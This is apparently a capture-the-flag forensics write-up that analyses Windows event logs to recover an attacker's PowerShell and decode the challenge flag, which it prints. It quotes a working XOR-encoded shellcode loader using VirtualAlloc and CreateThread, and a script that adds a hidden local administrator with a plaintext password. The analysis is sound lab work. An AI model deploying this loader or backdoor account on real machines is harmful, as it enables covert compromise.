HTB-CA22-forensic-puppeteer
Disclaimer
This was just an exploration in how to do things with both the host-system (windows) and also in linux. Like reading the event-logs and such. The route taken might not be the quickest, but it was fun to experiment with various ways to do things.
Backstory
Each challenge had a story tied to it, for this challenge it was:
Planet Longhir is known for it’s top-tier researchers. Due to their dedication in science and engineering, their military equipment is the most advanced one in the galaxy.
In fact, the prototype DES-3000, a self-propelled precision-strike missile that is capable of reaching targets even in Ratnik galaxy, is being used to disable Galactic Federation’s communication satellites.
The mystery that Miyuki is trying to solve is, how the satellite’s location was leaked since it is a top-sercret that only Galactic Federation’s council is aware of. Help her analyse the Council’s HQ event logs and solve this mystery.
Attack the challenge
There’s a downloadable file: forensics_puppeteer.zip
containing Windows Logs , which needs to be analyzed in order to see how the satelite location was leaked. We assume that we’re looking for some type of GPS coordinates or lat/long.
The usual suspects:
grep -iR “HTB{” . // Returned nothing
grep -iR “satelite” . // returned nothing
grep -iR “lat” . // returned two files, mentioning that they are binary:
grep: ./Microsoft-Windows-LiveId%4Operational.evtx: binary file matches
grep: ./Microsoft-Windows-Store%4Operational.evtx: binary file matches
Analyzing the “LiveId Operational” seems to show some type of communication with tokes and such. Probably rabbithole.
Next try:
The files are all named differently, with an annoying %4 and spaces, so rename all of them and remove spaces from filenames.
Afterwards, use the program: https://github.com/omerbenamram/evtx to convert all the evtx files to JSON.
small script to fix filenames:
#!/bin/bash
FILER=$(ls /mnt/hgfs/VMSHARED/HTB/cyberApocalypse2022/forensics/puppeteer/Logs/test/*.evtx)
# remove the space from the names
for fil in $FILER
do
newname=$(echo $fil | sed 's/ //g')
mv $fil $newname
done
# remove the %4 from name
for fil in $FILER
do
newname2=$(echo $fil | sed 's/%4//g')
mv $fil $newname2
done
and in order to not do everything manually, we simplify the evtx to json:
#!/bin/bash
FILES=$(ls *.evtx)
#evtx_dump -f <output_file> -o json <input_file>
for FIL in $FILES; do
./evtx_dump-v0.7.2-x86_64-unknown-linux-gnu -f "$FIL.json" -o json "$FIL"
done
A lot of the JSON files were empty, so lets clear those out:
mkdir JSON
mv *.json JSON/
find JSON/ -empty -type f -delete
start searching through the JSON in order to see whether we can find some more interesting strings:
grep -iR "HQ" .
looking for special_orders.ps1 led to some more interesting stuff like:
./Microsoft-Windows-PowerShellOperational.evtx.json: "ScriptBlockText":
"$OleSPrlmhB = @\"\r\n[DllImport(\"kernel32.dll\")]\r\npublic static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);\r\n[DllImport(\"kernel32.dll\")]\r\npublic static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);\r\n\"@\r\n\r\n[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3;\r\n[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;\r\n\r\n$tNZvQCljVk = Add-Type -memberDefinition $OleSPrlmhB -Name \"Win32\" -namespace Win32Functions -passthru;\r\n\r\n[Byte[]] $HVOASfFuNSxRXR = 0x2d,0x99,0x52,0x35,0x21,0x39,0x1d,0xd1,0xd1,0xd1,0x90,0x80,0x90,0x81,0x83,0x99,0xe0,0x03,0xb4,0x99,0x5a,0x83,0xb1,0x99,0x5a,0x83,0xc9,0x80,0x87,0x99,0x5a,0x83,0xf1,0x99,0xde,0x66,0x9b,0x9b,0x9c,0xe0,0x18,0x99,0x5a,0xa3,0x81,0x99,0xe0,0x11,0x7d,0xed,0xb0,0xad,0xd3,0xfd,0xf1,0x90,0x10,0x18,0xdc,0x90,0xd0,0x10,0x33,0x3c,0x83,0x99,0x5a,0x83,0xf1,0x90,0x80,0x5a,0x93,0xed,0x99,0xd0,0x01,0xb7,0x50,0xa9,0xc9,0xda,0xd3,0xde,0x54,0xa3,0xd1,0xd1,0xd1,0x5a,0x51,0x59,0xd1,0xd1,0xd1,0x99,0x54,0x11,0xa5,0xb6,0x99,0xd0,0x01,0x5a,0x99,0xc9,0x81,0x95,0x5a,0x91,0xf1,0x98,0xd0,0x01,0x32,0x87,0x99,0x2e,0x18,0x9c,0xe0,0x18,0x90,0x5a,0xe5,0x59,0x99,0xd0,0x07,0x99,0xe0,0x11,0x90,0x10,0x18,0xdc,0x7d,0x90,0xd0,0x10,0xe9,0x31,0xa4,0x20,0x9d,0xd2,0x9d,0xf5,0xd9,0x94,0xe8,0x00,0xa4,0x09,0x89,0x95,0x5a,0x91,0xf5,0x98,0xd0,0x01,0xb7,0x90,0x5a,0xdd,0x99,0x95,0x5a,0x91,0xcd,0x98,0xd0,0x01,0x90,0x5a,0xd5,0x59,0x90,0x89,0x90,0x89,0x8f,0x88,0x99,0xd0,0x01,0x8b,0x90,0x89,0x90,0x88,0x90,0x8b,0x99,0x52,0x3d,0xf1,0x90,0x83,0x2e,0x31,0x89,0x90,0x88,0x8b,0x99,0x5a,0xc3,0x38,0x9a,0x2e,0x2e,0x2e,0x8c,0x98,0x6f,0xa6,0xa2,0xe3,0x8e,0xe2,0xe3,0xd1,0xd1,0x90,0x87,0x98,0x58,0x37,0x99,0x50,0x3d,0x71,0xd0,0xd1,0xd1,0x98,0x58,0x34,0x98,0x6d,0xd3,0xd1,0xd4,0xe8,0x11,0x79,0xd1,0xc3,0x90,0x85,0x98,0x58,0x35,0x9d,0x58,0x20,0x90,0x6b,0x9d,0xa6,0xf7,0xd6,0x2e,0x04,0x9d,0x58,0x3b,0xb9,0xd0,0xd0,0xd1,0xd1,0x88,0x90,0x6b,0xf8,0x51,0xba,0xd1,0x2e,0x04,0xbb,0xdb,0x90,0x8f,0x81,0x81,0x9c,0xe0,0x18,0x9c,0xe0,0x11,0x99,0x2e,0x11,0x99,0x58,0x13,0x99,0x2e,0x11,0x99,0x58,0x10,0x90,0x6b,0x3b,0xde,0x0e,0x31,0x2e,0x04,0x99,0x58,0x16,0xbb,0xc1,0x90,0x89,0x9d,0x58,0x33,0x99,0x58,0x28,0x90,0x6b,0x48,0x74,0xa5,0xb0,0x2e,0x04,0x54,0x11,0xa5,0xdb,0x98,0x2e,0x1f,0xa4,0x34,0x39,0x42,0xd1,0xd1,0xd1,0x99,0x52,0x3d,0xc1,0x99,0x58,0x33,0x9c,0xe0,0x18,0xbb,0xd5,0x90,0x89,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xaf,0x84,0x99,0x52,0x15,0xf1,0x8f,0x58,0x27,0xbb,0x91,0x90,0x88,0xb9,0xd1,0xc1,0xd1,0xd1,0x90,0x89,0x99,0x58,0x23,0x99,0xe0,0x18,0x90,0x6b,0x89,0x75,0x82,0x34,0x2e,0x04,0x99,0x58,0x12,0x98,0x58,0x16,0x9c,0xe0,0x18,0x98,0x58,0x21,0x99,0x58,0x0b,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xac,0xf9,0x89,0x90,0x86,0x88,0xb9,0xd1,0x91,0xd1,0xd1,0x90,0x89,0xbb,0xd1,0x8b,0x90,0x6b,0xda,0xfe,0xde,0xe1,0x2e,0x04,0x86,0x88,0x90,0x6b,0xa4,0xbf,0x9c,0xb0,0x2e,0x04,0x98,0x2e,0x1f,0x38,0xed,0x2e,0x2e,0x2e,0x99,0xd0,0x12,0x99,0xf8,0x17,0x99,0x54,0x27,0xa4,0x65,0x90,0x2e,0x36,0x89,0xbb,0xd1,0x88,0x98,0x16,0x13,0x21,0x64,0x73,0x87,0x2e,0x04;\r\n\r\n[array]::Reverse($stage2);\r\n\r\n$hRffYLENA = $tNZvQCljVk::VirtualAlloc(0,[Math]::Max($HVOASfFuNSxRXR.Length,0x1000),0x3000,0x40);\r\n\r\n$stage3 = $stage1 + $stage2;\r\n\r\n[System.Runtime.InteropServices.Marshal]::Copy($HVOASfFuNSxRXR,0,$hRffYLENA,$HVOASfFuNSxRXR.Length);\r\n\r\n\r\n# Unpack Shellcode;\r\n\r\nfor($i=0; $i -lt $HVOASfFuNSxRXR.count ; $i++)\r\n{\r\n $HVOASfFuNSxRXR[$i] = $HVOASfFuNSxRXR[$i] -bxor 0xd1;\r\n}\r\n\r\n#Unpack Special Orders!\r\n\r\nfor($i=0;$i -lt $stage3.count;$i++){\r\n $stage3[$i] = $stage3[$i] -bxor 0xd1;\r\n}\r\n\r\n$tNZvQCljVk::CreateThread(0,0,$hRffYLENA,0,0,0);\r\n"
further investigation of files containing HQ
in the file: Microsoft-Windows-PowerShellOperational.evtx
there were some signs of a backup_op administrator being created, and some scheduled tasks to sabotage for miyuki
Log Name: Microsoft-Windows-PowerShell/Operational
Source: Microsoft-Windows-PowerShell
Date: 2022-05-06 17:43:51
Event ID: 4104
Task Category: Execute a Remote Command
Level: Warning
Keywords: None
User: S-1-5-21-2389065719-3342106636-307857974-1002
Computer: Council-HQ
Description:
Creating Scriptblock text (1 of 1):
# Create a new task action
$taskAction = New-ScheduledTaskAction -Execute 'powershell.exe';
$taskTrigger = New-ScheduledTaskTrigger -Daily -At 3PM;
# The name of your scheduled task.
$taskName = "Elevate Powers"
# Describe the scheduled task.
$description = "Steal weapons"
# Register the scheduled task
Register-ScheduledTask -TaskName $taskName -Action $taskAction -Trigger $taskTrigger -Description $description
# Create a new task action
$taskAction = New-ScheduledTaskAction -Execute 'powershell.exe';
$taskTrigger = New-ScheduledTaskTrigger -Daily -At 3PM;
# The name of your scheduled task.
$taskName = "Sabotage Miyuki"
# Describe the scheduled task.
$description = "Bypass Arms Embargo"
# Register the scheduled task
Register-ScheduledTask -TaskName $taskName -Action $taskAction -Trigger $taskTrigger -Description $description
#start windows update service
Get-Service -Name wuauserv | Start-Service -Verbose
#delete childs
Get-ChildItem "C:\Windows\SoftwareDistribution\*" -Recurse -Force -Verbose -ErrorAction SilentlyContinue | remove-item -force -Verbose -recurse -ErrorAction SilentlyContinue
#clear temp folder
Get-ChildItem "C:\users\*\AppData\Local\Temp\*" -Recurse -Force -ErrorAction SilentlyContinue |
Where-Object { ($_.CreationTime -lt $(Get-Date).AddDays(-$DaysToDelete))} |
remove-item -force -Verbose -recurse -ErrorAction SilentlyContinue
cleanmgr /sagerun:12
do {
"waiting for cleanmgr to complete. . ."
start-sleep 5
} while ((get-wmiobject win32_process | where-object {$_.processname -eq ‘cleanmgr.exe’} | measure).count)
# Create Admin Account
function Create-NewLocalAdmin {
[CmdletBinding()]
param (
[string] $NewLocalAdmin,
[securestring] $Password
)
begin {
}
process {
New-LocalUser "$NewLocalAdmin" -Password $Password -FullName "$NewLocalAdmin" -Description "Temporary local admin"
Write-Verbose "$NewLocalAdmin local user crated"
Add-LocalGroupMember -Group "Administrators" -Member "$NewLocalAdmin"
Write-Verbose "$NewLocalAdmin added to the local administrator group"
}
end {
}
}
$NewLocalAdmin = "backup_op";
$Password = ConvertTo-SecureString "sup3rk3y" -AsPlainText -Force;
Create-NewLocalAdmin -NewLocalAdmin $NewLocalAdmin -Password $Password
save the special_orders.ps1 script , and modify the code so just unpacking the special orders is run:
[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3;
[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;
[array]::Reverse($stage2);
$stage3 = $stage1 + $stage2;
#Unpack Special Orders!
for ($i = 0; $i -lt $stage3.count; $i++) {
$stage3[$i] = $stage3[$i] -bxor 0xd1;
}
write-host $stage3
run the powershell script and get characters in decimal output:
72 84 66 123 98 51 119 104 52 114 51 95 48 102 95 116 104 51 95 98 48 48 116 53 95 48 102 95 106 117 115 116 49 99 51 46 46 46 125
run that through cyberchef with decimal to ascii and get:
HTB{b3wh4r3_0f_th3_b00t5_0f_just1c3…}
Flag: HTB{b3wh4r3_0f_th3_b00t5_0f_just1c3...}